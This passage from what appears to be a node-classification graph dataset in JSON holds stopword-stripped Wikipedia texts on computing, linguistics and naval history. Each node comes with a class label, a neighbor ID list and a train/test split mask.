      4174,
      1617,
      4178,
      9813,
      603,
      2145,
      1648,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      6797,
      10902,
      3224,
      4771,
      7846,
      10414,
      3250,
      7865,
      8391,
      10952,
      6345,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      4353,
      3847,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      1835,
      10029,
      9009,
      11570,
      823,
      5952,
      321,
      1348,
      844,
      11616,
      370,
      7027,
      2943,
      9609,
      9612,
      8080,
      4505,
      9114,
      10654,
      8607,
      11683,
      3496,
      10166,
      6584,
      2493,
      6082,
      7629,
      9166,
      2006,
      8161,
      6114,
      1513,
      4074,
      9196,
      4590,
      5103,
      11247,
      3573,
      10229,
      5118,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10080,
    "label": 2,
    "text": "Bada:bada bada stylized bada korean discontinued operating system mobile devices smartphones tablet computers developed samsung electronics name derived bada meaning ocean sea korean ranges mid- high-end smartphones foster adoption bada os since 2011 samsung reportedly considered releasing source code open-source license expanding device support include smart tvs samsung announced june 2012 intentions merge bada tizen project would meanwhile use bada operating system parallel google android os microsoft windows phone smartphones devices running bada branded wave name unlike samsung devices branded name galaxy encompass whole range samsung devices running android 25 february 2013 samsung announced would stop developing bada moving development tizen instead bug reporting finally terminated april 2014 announcement bada wave s8500 would eventually turn first bada-based phone first shown public mobile world congress 2010 barcelona february 2010 alongside bada applications running bada exhibited including mobile videogames like gameloft asphalt 5 samsung wave s8500 released april year sold one million handsets first four weeks market according samsung companies twitter ea capcom gameloft blockbuster revealed support bada platform arranged development partnerships samsung since launch shared insights vision future mobile apps bada would play role showcase could heard series events held across world year 2010 called developer days addition made public announcement incoming bada developer challenge total prize 2,700,000 usd throughout launch event may 2010 samsung released beta bada software development kit sdk making available general public done partners previous december entice potential developers applications platform august 2010 samsung released version 1.0 bada sdk year later august 2011 version 2.0 bada sdk released samsung s8500 wave launched version 1.0 bada operating system samsung soon released version 1.0.2 included minor fixes european users latest version 1.2 released samsung s8530 wave ii phone alpha-version bada 2.0 introduced 15 february 2011 samsung s8530 wave ii handset current flagship bada handset samsung wave 3 s8600 running bada 2.0 release samsung wave samsung opened international application store samsung apps bada platform samsung apps 2400 applications store also available android samsung feature phones samsung remove bada brand market new os tizen apps store new store around 1000 applications tizen bada samsung defines operating system platform kernel configurable architecture allows using either proprietary real-time operating system hybrid rtos kernel linux kernel according copyrights displayed samsung wave s8500 uses code freebsd netbsd openbsd despite numerous suggestions known bada device date running linux kernel similarly evidence bada uses similar graphics stack tizen os particular efl device layer provides core functions graphics protocols telephony security service layer provides service-centric features sms mapping in-app-purchasing provide features so-called bada server top layer framework layer provides application programming interface api c++ application developers use bada provides various ui controls developers provides assorted basic ui controls listbox color picker tab web browser control based open-source webkit features adobe flash supporting flash 9 10 11 flash lite 4 actionscript 3.0 support bada 2.0 webkit flash embedded inside native bada applications bada supports opengl es 2.0 3d graphics api offers interactive mapping point interest poi features also embedded inside native applications supports pinch-to-zoom tabbed browsing cut copy paste features bada supports many mechanisms enhance interaction incorporated applications include various sensors motion sensing vibration control face detection accelerometer magnetometer tilt global positioning system gps multi-touch native applications developed c++ bada sdk eclipse based integrated development environment ide gnu-based tool chains used building debugging applications ide also contains ui builder developers easily design interface applications dragging dropping ui controls forms testing debugging ide contains emulator run apps publications criticized bada 1.x following issues bada 2.0 version shown ifa 2011 berlin released end december 2011 lot new functions improvements compared version 1.2 introducing features end 2011 samsung released three new models preloaded bada 2.0 ending list devices running short-lived bada chart show global sales bada smartphones second quarter 2010 second quarter 2013 canalys technology market analysis company estimated samsung shipped 3.5 million phones running bada q1 2011 rose 4.5 million phones q2 2011 according gartner q1 2012 bada gained grow index +43 rose 2.7 market share 1.9 q1 2011 south korea fiscal year calendar year",
    "neighbors": [
      2179,
      6276,
      9605,
      8326,
      11271,
      4364,
      3089,
      2707,
      2835,
      9366,
      10393,
      6301,
      5406,
      4383,
      11294,
      673,
      2852,
      3626,
      7727,
      3248,
      7857,
      7983,
      7991,
      9784,
      1083,
      2368,
      5824,
      7492,
      69,
      8262,
      11079,
      5067,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      3162,
      8794,
      10330,
      607,
      2658,
      6883,
      487,
      8423,
      3561,
      10215,
      6763,
      6508,
      2925,
      9964,
      495,
      10599,
      5363,
      1524,
      7029,
      11254,
      6391,
      5369,
      6266,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Train"
  },
  {
    "node_id": 10081,
    "label": 0,
    "text": "Articulatory_phonology:articulatory phonology articulatory phonology linguistic theory originally proposed 1986 catherine browman haskins laboratories louis m. goldstein yale university haskins theory identifies theoretical discrepancies phonetics phonology aims unify two treating low- high-dimensional descriptions single system unification achieved incorporating single model idea physical system identified phonetics constrains underlying abstract system identified phonology making units control abstract planning level physical level plan utterance formatted gestural score provides input physically based model speech production task dynamic model elliot saltzman gestural score graphs locations within vocal tract constriction occur indicating planned target degree constriction computational model speech production developed haskins laboratories combines articulatory phonology task dynamics haskins articulatory synthesis system developed philip rubin colleagues",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 10082,
    "label": 4,
    "text": "Dwight_Agnew:dwight agnew dwight merle agnew january 1 1902 – october 4 1969 united states navy officer fredericktown ohio destroyer commander world present attack pearl harbor later received navy cross tactical acumen guadalcanal campaign post-war led destroyer squadron 10 later worked national security agency 1956 moved retired list made tombstone admiral agnew married thelma marie biegler daughter united states army officer medal honor recipient george w. biegler dwight agnew born fredericktown ohio january 1 1902 murray agnew emma louise agnew née follin graduating fredericktown high school briefly attended denison university entering united states naval academy graduated naval academy 1926 commissioned ensign prior world war ii agnew held variety shipboard postings serving aboard time nevada number four gun turret crew – leadership – trenchard medal excellence gunnery japanese attack pearl harbor december 7 1941 agnew family – dwight brother henry sisters brothers-in-law latter also navy officers – stationed hawaii time agnew serving commanding officer uss trever destroyer minesweeper like many american ship captains agnew aboard vessel attack began 0755 december 7 command junior officers uss trever sounded general alarm 0757 began returning fire japanese forces seven minutes later successfully downing imperial japanese navy air service aircraft strafing pearl city yacht club well second aircraft maneuvering attack ship frantic orders sortie fleet resulted agnew left behind aboard trever instead putting sea commander helm following attack wasmuth rendezvoused trever agnew rejoined ship trever depth charges already armed set agnew ordered magnetic sweep harbor taking defensive station harbor mouth protect feared second wave attack materialize following week december 14 agnew led trever rescue crew passengers torpedoed norwegian freighter ms høegh merchant høegh merchant sunk japanese submarine attempting navigate safe port following outbreak hostilities august 1942 agnew promoted captain continuing commanding officer agnew received navy cross tactical brilliance repelling attack imperial japanese navy upon trever task unit leading guadalcanal campaign according citation 1943 transferred san francisco california oversee outfitting new subsequently commanding ship engagements pacific received bronze star agnew given command attack transport 1945 commanded battle iwo jima following world war ii agnew held variety staff assignments navy – including naval representative joint american military mission aid turkey – january 1952 february 1953 commanding officer destroyer squadron 10 united states atlantic fleet final three years military career 1956 retirement assigned national security agency upon retirement advanced rank rear admiral died october 4 1969 october 1929 agnew married thelma marie biegler daughter army officer george w. biegler following outbreak world thelma agnew son dwight agnew jr evacuated san diego stay dwight agnew mother living city agnew brother henry also alumnus u.s naval academy instructor academy also held several shipboard assignments world given command post-war period sisters dorothy elizabeth married naval officers",
    "neighbors": [
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10083,
    "label": 9,
    "text": "Scheme_(programming_language):scheme programming language scheme programming language supports multiple paradigms including functional imperative programming one three main dialects lisp alongside common lisp clojure unlike common lisp scheme follows minimalist design philosophy specifying small standard core powerful tools language extension scheme created 1970s mit ai lab released developers guy l. steele gerald jay sussman via series memos known lambda papers first dialect lisp choose lexical scope first require implementations perform tail-call optimization giving stronger support functional programming associated techniques recursive algorithms also one first programming languages support first-class continuations significant influence effort led development common lisp scheme language standardized official ieee standard de facto standard called revised report algorithmic language scheme r n rs widely implemented standard r5rs 1998 new standard r6rs ratified 2007 scheme diverse user base due compactness elegance minimalist philosophy also caused wide divergence practical implementations much scheme steering committee calls world unportable programming language family dialects rather single language scheme started 1970s attempt understand carl hewitt actor model purpose steele sussman wrote tiny lisp interpreter using maclisp added mechanisms creating actors sending messages scheme originally called schemer tradition lisp-derived languages planner conniver current name resulted authors use operating system limited filenames two components six characters currently schemer commonly used refer scheme programmer new language standardization process began 2003 scheme workshop goal producing r6rs standard 2006 process broke earlier r n rs approach unanimity r6rs features standard module system allowing split core language libraries number drafts r6rs specification released final version r5.97rs successful vote resulted ratification new standard announced august 28 2007 currently newest releases various scheme implementations support r6rs standard portable reference implementation proposed implicitly phased libraries r6rs called psyntax loads bootstraps properly various older scheme implementations feature r6rs record-type descriptor rtd rtd created used record type representation show memory layout also calculated object field bit mask mutable scheme object field bit masks helped garbage collector know fields without traversing whole fields list saved rtd rtd allows users expand basic rtd create new record system r6rs introduces numerous significant changes language source code specified unicode large subset unicode characters may appear scheme symbols identifiers minor changes lexical rules character data also specified unicode many standard procedures moved new standard libraries form large expansion standard containing procedures syntactic forms formerly part standard new module system introduced systems exception handling standardized syntax-rules replaced expressive syntactic abstraction facility syntax-case allows use scheme macro expansion time compliant implementations required support scheme full numeric tower semantics numbers expanded mainly direction support ieee 754 standard floating point numerical representation r6rs standard caused controversy seen departed minimalist philosophy august 2009 scheme steering committee oversees standardization process announced intention recommend splitting scheme two languages large modern programming language programmers small version subset large version retaining minimalism praised educators casual implementors two working groups created work two new versions scheme scheme reports process site links working groups charters public discussions issue tracking system ninth draft r7rs small language made available april 15 2013 vote ratifying draft closed may 20 2013 final report available since august 6 2013 describing 'small language effort therefore considered isolation successor r6rs scheme primarily functional programming language shares many characteristics members lisp programming language family scheme simple syntax based s-expressions parenthesized lists prefix operator followed arguments scheme programs thus consist sequences nested lists lists also main data structure scheme leading close equivalence source code data formats homoiconicity scheme programs easily create evaluate pieces scheme code dynamically reliance lists data structures shared lisp dialects scheme inherits rich set list-processing primitives codice_1 codice_2 codice_3 lisp progenitors scheme uses strictly dynamically typed variables supports first class procedures thus procedures assigned values variables passed arguments procedures section concentrates mainly innovative features language including features distinguish scheme lisps unless stated otherwise descriptions features relate r5rs standard examples provided section notation === result used indicate result evaluating expression immediately preceding line convention used r5rs subsection describes features scheme distinguished programming languages earliest days aspects scheme strongly influence product scheme language aspects versions scheme programming language 1973 onward share scheme simple language much easier implement many languages comparable expressive power ease attributable use lambda calculus derive much syntax language primitive forms instance 23 s-expression-based syntactic constructs defined r5rs scheme standard 14 classed derived library forms written macros involving fundamental forms principally lambda r5rs says r5rs sec 3.1 fundamental variable binding constructs lambda expression variable binding constructs explained terms lambda expressions example macro implement codice_4 expression using codice_5 perform variable bindings define-syntax let thus using codice_4 defined scheme implementation would rewrite codice_7 codice_8 reduces implementation task coding procedure instantiations 1998 sussman steele remarked minimalism scheme conscious design goal rather unintended outcome design process actually trying build something complicated discovered serendipitously accidentally designed something met goals much simpler intended ... realized lambda calculus—a small simple formalism—could serve core powerful expressive programming language like modern programming languages unlike earlier lisps maclisp scheme lexically scoped possible variable bindings program unit analyzed reading text program unit without consideration contexts may called contrasts dynamic scoping characteristic early lisp dialects processing costs associated primitive textual substitution methods used implement lexical scoping algorithms compilers interpreters day lisps perfectly possible reference free variable inside procedure refer quite distinct bindings external procedure depending context call impetus incorporate lexical scoping unusual scoping model early 1970s new version lisp came sussman studies algol suggested algol-like lexical scoping mechanisms would help realize initial goal implementing hewitt actor model lisp key insights introduce lexical scoping lisp dialect popularized sussman steele 1975 lambda paper scheme interpreter extended lambda calculus adopted concept lexical closure page 21 described ai memo 1970 joel moses attributed idea peter j. landin alonzo church mathematical notation lambda calculus inspired lisp use lambda keyword introducing procedure well influencing development functional programming techniques involving use higher-order functions lisp early lisps suitable expressions lambda calculus treatment free variables formal lambda system axioms complete calculation rule helpful analysis using mathematical logic tools system calculation seen directional deduction syntax lambda calculus follows recursive expressions x z ... parentheses spaces period symbol λ function lambda calculation includes first serve starting point powerful mathematical logic second reduce requirement programmers consider implementation details use imitate machine evaluation finally lambda calculation created substantial meta-theory introduction lexical scope resolved problem making equivalence forms lambda notation practical expression working programming language sussman steele showed new language could used elegantly derive imperative declarative semantics programming languages including algol fortran dynamic scope lisps using lambda expressions simple procedure instantiations control structures environment modifiers introduced continuation-passing style along first description scheme first lambda papers subsequent papers proceeded demonstrate raw power practical use lambda calculus scheme inherits block structure earlier block structured languages particularly algol scheme blocks implemented three binding constructs codice_4 codice_10 codice_11 instance following construct creates block symbol called codice_12 bound number 10 let var 10 blocks nested create arbitrarily complex block structures according need programmer use block structuring create local bindings alleviates risk namespace collision otherwise occur one variant codice_4 codice_10 permits bindings refer variables defined earlier construct thus variant codice_11 designed enable mutually recursive procedures bound one another === 1 0 1 0 2 1 2 2 3 2 3 3 4 4 5 4 5 5 procedures bound single codice_11 may refer one another name well values variables defined earlier codice_11 may refer values defined later codice_11 variant codice_4 named let form identifier codice_4 keyword binds let variables argument procedure whose name given identifier whose body body let form body may repeated desired calling procedure named let widely used implement iteration example simple counter === 1 2 3 4 5 6 7 8 9 10 like procedure scheme procedure created named let first class object scheme iteration construct codice_21 idiomatic scheme use tail recursion express iteration standard-conforming scheme implementations required optimize tail calls support unbounded number active tail calls r5rs sec 3.5 —a property scheme report describes proper tail recursion —making safe scheme programmers write iterative algorithms using recursive structures sometimes intuitive tail recursive procedures named codice_4 form provide support iteration using tail recursion === 0 1 4 9 16 25 36 49 64 81 continuations scheme first-class objects scheme provides procedure codice_23 also known codice_24 capture current continuation packing escape procedure bound formal argument procedure provided programmer r5rs sec 6.4 first-class continuations enable programmer create non-local control constructs iterators coroutines backtracking continuations used emulate behavior return statements imperative programming languages following function codice_25 given function codice_26 list codice_27 returns first element codice_28 codice_27 codice_30 returns true === 7 === f following example traditional programmer puzzle shows scheme handle continuations first-class objects binding variables passing arguments procedures let* yin executed code displays counting sequence codice_31 contrast common lisp data procedures scheme share common namespace whereas common lisp functions data separate namespaces making possible function variable name requiring special notation referring function value sometimes known lisp-1 vs. lisp-2 distinction referring unified namespace scheme separate namespaces common lisp scheme primitives used manipulate bind data used bind procedures equivalent common lisp codice_32 codice_33 primitives define f 10 f === 10 set f f f 6 f === 26 set f lambda n n 12 === 18 set f f 1 f === 13 apply 1 2 3 4 5 6 === 21 === 101 102 103 subsection documents design decisions taken years given scheme particular character direct outcomes original design scheme specifies comparatively full set numerical datatypes including complex rational types known scheme numerical tower r5rs sec 6.2 standard treats abstractions commit implementor particular internal representations numbers may quality exactness exact number produced sequence exact operations involving exact numbers—inexactness thus contagious standard specifies two implementations must produce equivalent results operations resulting exact numbers r5rs standard specifies procedures codice_34 codice_35 used change exactness number codice_35 produces exact number numerically closest argument codice_34 produces inexact number numerically closest argument r6rs standard omits procedures main report specifies r5rs compatibility procedures standard library rnrs r5rs 6 r5rs standard scheme implementations required implement whole numerical tower must implement coherent subset consistent purposes implementation spirit scheme language r5rs sec 6.2.3 new r6rs standard require implementation whole tower exact integer objects exact rational number objects practically unlimited size precision implement certain procedures ... always return exact results given exact arguments r6rs sec 3.4 sec 11.7.1 example 1 exact arithmetic implementation supports exact rational complex numbers define x 1/3 1/4 -1/5 -1/3i 405/50+2/3i x === 509/60+1/3i exact x === example 2 arithmetic implementation supports neither exact rational numbers complex numbers accept real numbers rational notation define xr 1/3 1/4 -1/5 405/50 define xi -1/3 2/3 xr === 8.48333333333333 xi === 0.333333333333333 exact xr === f === f implementations conform r5rs standard second conform r6rs implement full numerical tower scheme supports delayed evaluation codice_38 form procedure codice_39 === 22 === 70 === 22 lexical context original definition promise preserved value also preserved first use codice_39 promise ever evaluated primitives produce handle values known promises used implement advanced lazy evaluation constructs streams r6rs standard longer primitives instead provided part r5rs compatibility library rnrs r5rs 6 r5rs suggested implementation codice_38 codice_39 given implementing promise procedure arguments thunk using memoization ensure ever evaluated irrespective number times codice_39 called r5rs sec 6.4 srfi 41 enables expression finite infinite sequences extraordinary economy example definition fibonacci sequence using functions defined srfi 41 define fibs stream-ref fibs 99 === 218922995834555169026 lisps specify order evaluation procedure arguments scheme order evaluation—including order expression operator position evaluated—may chosen implementation call-by-call basis constraint effect concurrent evaluation operator operand expressions constrained consistent sequential order evaluation r5rs sec 4.1.3 === 3 ev procedure describes argument passed returns value argument contrast lisps appearance expression operator position first item scheme expression quite legal long result expression operator position procedure calling procedure add 1 2 expressions ev ev 1 ev 2 may evaluated order long effect evaluated parallel thus following three lines may displayed order standard scheme example code executed although text one line may interleaved another would violate sequential evaluation constraint r5rs standard also later reports syntax scheme easily extended via macro system r5rs standard introduced powerful hygienic macro system allows programmer add new syntactic constructs language using simple pattern matching sublanguage r5rs sec 4.3 prior hygienic macro system relegated appendix r4rs standard high level system alongside low level macro system treated extensions scheme rather essential part language implementations hygienic macro system also called codice_44 required respect lexical scoping rest language assured special naming scoping rules macro expansion avoids common programming errors occur macro systems programming languages r6rs specifies sophisticated transformation system codice_45 available language extension r5rs scheme time define-syntax invocations macros procedures bear close resemblance—both s-expressions—but treated differently compiler encounters s-expression program first checks see symbol defined syntactic keyword within current lexical scope attempts expand macro treating items tail s-expression arguments without compiling code evaluate process repeated recursively macro invocations remain syntactic keyword compiler compiles code evaluate arguments tail s-expression evaluate variable represented symbol head s-expression call procedure evaluated tail expressions passed actual arguments scheme implementations also provide additional macro systems among popular ones syntactic closures explicit renaming macros codice_46 non-hygienic macro system similar codice_47 system provided common lisp inability specify whether macro hygienic one shortcomings macro system alternative models expansion scope sets provide potential solution prior r5rs scheme standard equivalent codice_48 procedure ubiquitous lisps although first lambda paper described codice_49 similar lisp function eval first revised report 1978 replaced codice_50 took two arguments second third fourth revised reports omitted equivalent codice_48 reason confusion scheme lexical scoping result evaluating expression depends evaluated instance clear whether result evaluating following expression 5 6 evaluated outer environment codice_52 defined result sum operands evaluated inner environment symbol bound value procedure result product two operands r5rs resolves confusion specifying three procedures return environments providing procedure codice_48 takes s-expression environment evaluates expression environment provided r5rs sec 6.5 r6rs extends providing procedure called codice_54 programmer specify exactly objects import evaluation environment dialects lisp including common lisp convention value codice_55 evaluates value false boolean expression scheme since ieee standard 1991 values except f including codice_55 equivalent scheme written evaluate value true boolean expression r5rs sec 6.3.1 constant representing boolean value true codice_57 lisps scheme codice_58 scheme primitive datatypes disjoint one following predicates true scheme object codice_59 codice_60 codice_61 codice_62 codice_63 codice_64 codice_65 codice_66 codice_67 r5rs sec 3.2 within numerical datatype contrast numerical values overlap example integer value satisfies codice_68 codice_69 codice_70 codice_71 codice_62 predicates time r5rs sec 6.2 scheme three different types equivalence arbitrary objects denoted three different equivalence predicates relational operators testing equality codice_73 codice_74 codice_75 type dependent equivalence operations also exist scheme codice_83 codice_84 compare two strings latter performs case-independent comparison codice_85 codice_86 compare characters codice_87 compares numbers r5rs standard standard comment scheme semicolon makes rest line invisible scheme numerous implementations supported alternative conventions permitting comments extend single line r6rs standard permits two entire s-expression may turned comment commented preceding codice_88 introduced srfi 62 multiline comment block comment may produced surrounding text codice_89 codice_90 scheme input output based port datatype r5rs sec 6.6 r5rs defines two default ports accessible procedures codice_91 codice_92 correspond unix notions standard input standard output implementations also provide codice_93 redirection input standard output supported standard standard procedures codice_94 codice_95 implementations provide string ports similar redirection capabilities enabling many normal input-output operations performed string buffers instead files using procedures described srfi 6 r6rs standard specifies much sophisticated capable port procedures many new types port following examples written strict r5rs scheme example 1 output defaulting current-output-port example 2 1 using optional port argument output procedures example 3 1 output redirected newly created file let hello0 lambda display hello world newline example 4 2 explicit file open port close send output file example 5 2 using call-with-output-file send output file similar procedures provided input r5rs scheme provides predicates codice_96 codice_97 character input output codice_98 codice_99 codice_100 codice_101 provided writing reading scheme expressions scheme provides codice_102 codice_103 read operation result returned end-of-file object input port reached end file tested using predicate codice_104 addition standard srfi 28 defines basic formatting procedure resembling common lisp codice_105 function named scheme procedures bound variables r5rs language standard formally mandated programs may change variable bindings built-in procedures effectively redefining r5rs language changes example one may extend codice_106 accept strings well numbers redefining set === 6 === 123 r6rs every binding including standard ones belongs library exported bindings immutable r6rs sec 7.1 redefinition standard procedures mutation forbidden instead possible import different procedure name standard one effect similar redefinition standard scheme procedures convert one datatype another contain character string name predicates end procedures change value already-allocated data end conventions often followed scheme programmers formal contexts scheme standards word procedure used preference function refer lambda expression primitive procedure normal usage words procedure function used interchangeably procedure application sometimes referred formally combination lisps term thunk used scheme refer procedure arguments term proper tail recursion refers property scheme implementations perform tail-call optimization support indefinite number active tail calls form titles standards documents since r3rs revised report algorithmic language scheme reference title algol 60 standard document revised report algorithmic language algol 60 summary page r3rs closely modeled summary page algol 60 report language formally defined standards r5rs 1998 r6rs 2007 describe standard forms keywords accompanying syntax provide control structure language standard procedures perform common tasks table describes standard forms scheme forms appear one row easily classified single function language forms marked l table classed derived library forms standard often implemented macros using fundamental forms practice making task implementation much easier languages note codice_107 defined library syntax r5rs expander needs know achieve splicing functionality r6rs longer library syntax following two tables describe standard procedures r5rs scheme r6rs far extensive summary type would practical procedures appear one row easily classified single function language string character procedures contain -ci names perform case-independent comparisons arguments upper case lower case versions character taken equal implementations take two arguments defined left optional r5rs scheme minimalism many common procedures syntactic forms defined standard order keep core language small facilitate standardization extensions scheme community scheme request implementation srfi process extension libraries defined careful discussion extension proposals promotes code portability many srfis supported scheme implementations srfis fairly wide support different implementations include elegant minimalist design made scheme popular target language designers hobbyists educators small size typical interpreter also popular choice embedded systems scripting resulted scores implementations differ much porting programs one implementation another quite difficult small size standard language means writing useful program great complexity standard portable scheme almost impossible r6rs standard specifies much broader language attempt broaden appeal programmers almost implementations provide traditional lisp-style read–eval–print loop development debugging many also compile scheme programs executable binary support embedding scheme code programs written languages also common relative simplicity scheme implementations makes popular choice adding scripting capabilities larger systems developed languages c. gambit chicken bigloo scheme interpreters compile scheme c makes embedding particularly easy addition bigloo compiler configured generate jvm bytecode also features experimental bytecode generator .net implementations support additional features example kawa jscheme provide integration java classes scheme c compilers often make easy use external libraries written c allowing embedding actual c code scheme source another example pvts offers set visual tools supporting learning scheme scheme widely used number schools particular number introductory computer science courses use scheme conjunction textbook structure interpretation computer programs sicp past 12 years plt run programbydesign formerly teachscheme project exposed close 600 high school teachers thousands high school students rudimentary scheme programming mit old introductory programming class 6.001 taught scheme although 6.001 replaced modern courses sicp continues taught mit textbook design programs matthias felleisen currently northeastern university used institutes higher education introductory computer science courses northeastern university worcester polytechnic institute use scheme exclusively introductory courses fundamentals computer science cs2500 introduction program design cs1101 respectively rose-hulman uses scheme advanced programming language concepts course indiana university introductory class c211 taught entirely scheme introductory class uc berkeley cs 61a 2015 taught entirely scheme save minor diversions logo demonstrate dynamic scope course materials including lecture webcasts available online free charge self-paced version course cs 61as continues use scheme introductory computer science courses yale grinnell college also taught scheme programming design paradigms mandatory course computer science graduate students northeastern university also extensively uses scheme introductory computer science course university minnesota twin cities csci 1901 also uses scheme primary language followed course introduces students java programming language software industry tata consultancy services asia largest software consultancy firm uses scheme month-long training program fresh college graduates scheme is/was also used following",
    "neighbors": [
      512,
      10752,
      9730,
      3076,
      4101,
      11269,
      2056,
      9224,
      2062,
      9231,
      6160,
      2577,
      6673,
      5651,
      7184,
      2069,
      9749,
      8728,
      2585,
      4122,
      4633,
      8221,
      9245,
      1568,
      8226,
      8738,
      3119,
      5684,
      9780,
      2102,
      7734,
      9783,
      2105,
      2620,
      3132,
      6717,
      6718,
      2557,
      8258,
      8771,
      7237,
      8262,
      11333,
      1610,
      1613,
      9299,
      10324,
      4182,
      7256,
      7769,
      10841,
      3675,
      7267,
      2660,
      5220,
      8293,
      2666,
      10347,
      623,
      2672,
      6767,
      8304,
      9329,
      4727,
      2680,
      3705,
      5751,
      1147,
      6778,
      7805,
      9345,
      1159,
      4231,
      1673,
      6791,
      9865,
      3212,
      3216,
      9875,
      10387,
      3733,
      8854,
      5783,
      9877,
      2201,
      155,
      10395,
      5796,
      4774,
      2729,
      4777,
      4779,
      5803,
      7849,
      7852,
      2225,
      178,
      11442,
      6840,
      7867,
      4799,
      6335,
      10435,
      712,
      5833,
      7880,
      8908,
      205,
      5837,
      7889,
      2774,
      219,
      5852,
      8414,
      10463,
      7392,
      7904,
      11488,
      11490,
      11495,
      4841,
      4846,
      8430,
      5360,
      4337,
      5361,
      8435,
      9969,
      9975,
      5880,
      11513,
      6906,
      1277,
      2304,
      4865,
      4867,
      3334,
      1799,
      3336,
      5896,
      6919,
      6921,
      8973,
      10510,
      11023,
      5395,
      1301,
      6933,
      791,
      2840,
      10012,
      3869,
      5917,
      2335,
      8479,
      2849,
      3876,
      3370,
      11562,
      7981,
      7983,
      2352,
      5938,
      10547,
      1333,
      5429,
      823,
      311,
      4409,
      6969,
      10043,
      11574,
      7999,
      8000,
      10571,
      3408,
      6994,
      10067,
      11090,
      1365,
      8021,
      10581,
      2392,
      10584,
      10586,
      6498,
      6502,
      5993,
      8554,
      8043,
      11625,
      1390,
      3446,
      10102,
      2936,
      3960,
      377,
      8057,
      10104,
      7550,
      4992,
      10113,
      3462,
      6536,
      7562,
      1931,
      8587,
      5521,
      2964,
      8598,
      11674,
      1947,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      5546,
      9128,
      5040,
      2481,
      7616,
      5569,
      6594,
      963,
      4548,
      9152,
      4550,
      10191,
      5585,
      11218,
      11219,
      5588,
      9175,
      7128,
      4057,
      2010,
      3034,
      10712,
      11226,
      4064,
      10211,
      4069,
      3051,
      5611,
      7148,
      3056,
      9714,
      3573,
      7670,
      11255,
      9210,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10084,
    "label": 2,
    "text": "Mklivecd:mklivecd mklivecd script linux distributions allows one compile snapshot current hard drive partition data resides settings applications documents bookmarks etc compress iso 9660 cd-image allows easy backup user data also makes easy create customized linux-distribution linux-distributions like pclinuxos include graphical frontend easier script usage",
    "neighbors": [
      5618,
      3147,
      9902,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 10085,
    "label": 2,
    "text": "IntervalZero:intervalzero intervalzero inc. develops hard real-time software symmetric multiprocessing smp enabled rtx rtx64 software transform microsoft windows general-purpose operating system gpos real-time operating system rtos intervalzero engineering group regularly release new software cf history recent product rtx64 focuses 64-bit symmetric multiprocessing smp replace dedicated hardware based systems digital signal processors dsps field-programmable gate arrays fpgas multicore pcs instance audio mixing surface manufacturer largely deployed dsp based systems switched personal computer pc based systems dedicating multi-core processors real time audio processing founded july 2008 group former ardence executives intervalzero headed ceo jeffrey d. hibbard firm offices waltham nice france munich germany taiwan roc global presence important solutions deployed worldwide primarily industrial automation military aerospace medical devices digital media test simulation software corporate name intervalzero comes firm mission deliver deterministic hard real-time functionality interval zero technical definition optimal experience system command execution intervalzero lineage traces back 1980 group massachusetts institute technology mit engineers started venturcom began develop expertise embedded technology time venix developed marketed first innovation focus windows nt 4.0 possible real-time solution industry 1995 releasing rtx since lot controllers pc windows based second innovation came second product component integrator makes windows nt 4.0 embedded os licensed microsoft years later became origin windows nt embedded 2004 venturcom renamed ardence 20 december 2006 citrix systems announced agreement acquire ardence enterprise embedded software businesses integrated software streaming products citrix portfolio 2007 early 2008 2008 group former ardence executives founded intervalzero acquired ardence embedded software business citrix systems inc. citrix retained minority ownership firm intervalzero develops following products",
    "neighbors": [
      640,
      8576,
      2476,
      6797,
      3886,
      3250,
      10675,
      9366,
      4792,
      5371,
      6207
    ],
    "mask": "None"
  },
  {
    "node_id": 10086,
    "label": 7,
    "text": "Apcera:apcera apcera american cloud infrastructure company provides container management platform deploy orchestrate govern containers applications across on-premises cloud-based infrastructure apcera founded 2012 san francisco derek collison previously technology leader google tibco vmware designed first open platform-as-a-service paas cloud foundry apcera ’ primary offering apcera cloud platform provides governance security policy driven model allowing safe deployment management cloud-native applications microservices legacy applications well resources network services access user permissions according forbes tech apcera cloud platform enables clients manage migration legacy infrastructure newer approaches ... allows achieve significantly faster time-to-market … critical deployments without sacrificing crucial security requirements ” september 2014 ericsson acquired majority stake apcera cloud policy compliance apcera cloud platform available two forms community edition enterprise edition community edition free used deployment single infrastructure enterprise edition functionality deploy workloads multiple infrastructures apcera cloud platform allows user create set rules control available resources container level addition allows user connect back-end services outside platform maintaining governance allows users build workload move around container without re-writing code — needs connections made containers apcera also develops provides support several open source software projects including nats cloud-native enterprise messaging system kurma container runtime extensibility flexibility libretto golang virtual machine provisioning library public private clouds apcera ’ customers include nextsource ericsson qualcomm cygate rodan fields",
    "neighbors": [
      1435,
      9863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10087,
    "label": 6,
    "text": "FAT_filesystem_and_Linux:fat filesystem linux linux several filesystem drivers file allocation table fat filesystem format commonly known names used codice_1 command invoke particular drivers kernel msdos vfat umsdos linux filesystem drivers support three fat types namely fat12 fat16 fat32 differ provision support long filenames beyond 8.3 filename structure original fat filesystem format provision unix file semantics exist standard fat filesystem format file permissions filesystem drivers mutually exclusive one used mount given disk volume given time thus choice among determined long filenames unix semantics support use one wants make disk volume msdos filesystem driver provides extra unix file semantics long filename support fat disk filesystem mounted using driver 8.3 filenames visible long filenames accessible long filename data structures kind disk volume maintained vfat filesystem driver provides long filename support using disk data structures microsoft windows uses vfat long filename support fat format volumes support extra unix file semantics umsdos filesystem driver provides long filename support extra unix file semantics however using on-disk data structures recognized filesystem drivers operating systems linux key advantage umsdos three provides full unix file semantics therefore used situations desirable install linux run fat disk volume require semantics available however linux installed running disk volume slower linux installed running disk volume formatted example ext2 filesystem format unless utility program regularly run every time one switches running windows running linux certain changes made files directories disk windows cause error messages inaccessible files linux vfat whilst lacking full unix file semantics lacking ability linux installed running fat disk volume aforementioned disadvantages umsdos comes simply 